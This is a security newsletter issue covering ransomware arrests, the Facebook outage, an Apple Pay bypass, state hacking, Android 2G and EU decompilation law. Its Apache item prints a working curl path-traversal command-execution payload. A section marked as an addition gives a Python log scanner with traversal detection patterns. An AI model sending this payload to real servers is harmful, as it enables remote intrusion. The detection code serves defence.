TechLetters #48 - State hacking. Apple's app deletion GDPR policy. Decompiling to fix software is legal in Europe. 2G fades away.
Editorial
Security
Ransomware arrests. Ukrainian police arrested some suspected members of a ransomware group. Video is here. “Seizure of US$ 375 000 in cash. Seizure of two luxury vehicles worth €217 000”
Huge Facebook availability issue. Why in security? Well, we’ve just seen an example of how things may look when something goes really bad. It could’ve been much worse if it affected Cloudflare or AWS or other providers. Fortunately, the world did not lose any important capability (e.g. payments worked) this time. Facebook’s statement: “configuration changes on the backbone routers that coordinate network traffic between our data centers caused issues that interrupted this communication. This disruption to network traffic had a cascading effect on the way our data centers communicate, bringing our services to a halt”
Forcing contactless payments on iPhone. Works with Apple Pay + Visa. The device does not need to be unlocked. It can also be placed in someone else’s bag. “We found that a non-standard sequence of bytes is broadcast by Transport for London (TfL) ticket-gate readers, and that these “magic bytes” bypass the Apple Pay lock screen”
State hacking. Google warned about 14,000 users that they had been the target of a cyber op attempt by the Russian government. In contrast to kinetic areas, in cyber, governments are also fought by private companies. Efficiently. Microsoft says that the threat of Russian cyber attacks is increasing. “Russian attacks increasingly successful, from 21% success to 32% this year ... they are attacking government agencies more and more to gather intelligence (up from 3% a year ago to 53%)”. “growing industry of companies called private sector offensive actors (PSOAs) create and sell malicious cyber technologies that enable their customers to break into people’s computers, phones, and internet-connected devices”.
Remote code execution in Apache web server. Here: curl 'http://X/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' --data 'echo Content-Type: text/plain; <cmd>'
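The request above hides ".." behind two layers of percent-encoding: %%32%65 decodes to %2e, which decodes to a dot. As an added example, not part of the original newsletter, this Python check decodes request paths from access-log lines repeatedly and flags traversal that only appears after decoding. The log lines, the function names and the combined-log layout are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not taken from any real server).
SAMPLE_LOG = """\
203.0.113.7 - - [07/Oct/2021:10:01:12 +0000] "POST /cgi-bin/.%%32%65/.%%32%65/.%%32%65/bin/sh HTTP/1.1" 200 45
198.51.100.4 - - [07/Oct/2021:10:02:40 +0000] "GET /icons/.%2e/%2e%2e/etc/passwd HTTP/1.1" 403 199
192.0.2.10 - - [07/Oct/2021:10:03:05 +0000] "GET /docs/report%202021.pdf HTTP/1.1" 200 8812
192.0.2.11 - - [07/Oct/2021:10:04:31 +0000] "GET /search?q=100%25 HTTP/1.1" 200 512
"""

# Request line and status code in an assumed combined-log layout.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
# A ".." path segment once all encoding layers are removed.
TRAVERSAL_RE = re.compile(r'(^|/)\.\.(/|$)')

def decode_rounds(path, max_rounds=5):
    """Percent-decode until stable; return (final_path, rounds_that_changed_it)."""
    rounds = 0
    while rounds < max_rounds:
        decoded = unquote(path)
        if decoded == path:
            break
        path, rounds = decoded, rounds + 1
    return path, rounds

def classify(line):
    """Return a finding dict for a log line whose decoded path traverses, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    path = m.group("target").split("?", 1)[0]  # query string is out of scope here
    final, rounds = decode_rounds(path)
    if not TRAVERSAL_RE.search(final):
        return None
    # Two or more rounds means the ".." was hidden from a single-pass decoder.
    kind = "double-encoded traversal" if rounds >= 2 else "traversal"
    return {"kind": kind, "path": final, "status": m.group("status"), "rounds": rounds}

def scan(log_text):
    """Classify every line and keep only the findings."""
    return [hit for hit in map(classify, log_text.splitlines()) if hit]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A finding with a 2xx status deserves triage first, since the server served the decoded path instead of rejecting it.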
Android says bye to 2G. Android 12 will let users disable the ability to use 2G. This will increase security of some targeted users. “Used to trade privacy/security against potentially reduced carrier coverage”. “Downgrade attacks allow for adversaries to force an LTE connected UE to 2G or 3G, which has significantly less security controls. Ultimately, adversaries could perform man-in-the-middle (MiTM) active attacks and/or a passive (e.g. eavesdropping) attacks to collect sensitive information”
Privacy
Apple’s app deletion request. Apple will require apps to support account deletion, in support of GDPR Article 17 (right to be forgotten/erasure). Great when tech support for data protection regulations works at scale.
Technology Policy
Decompiling is legal. Important legal stuff for security:
1. Article 5(1) of Council Directive 91/250/EEC of 14 May 1991 on the legal protection of computer programs must be interpreted as meaning that the lawful purchaser of a computer program is entitled to decompile all or part of that program in order to correct errors affecting its operation, including where the correction consists in disabling a function that is affecting the proper operation of the application of which that program forms a part.
2. Article 5(1) of Directive 91/250 must be interpreted as meaning that the lawful purchaser of a computer program who wishes to decompile that program in order to correct errors affecting the operation thereof is not required to satisfy the requirements laid down in Article 6 of that directive. However, that purchaser is entitled to carry out such a decompilation only to the extent necessary to effect that correction and in compliance, where appropriate, with the conditions laid down in the contract with the holder of the copyright in that program.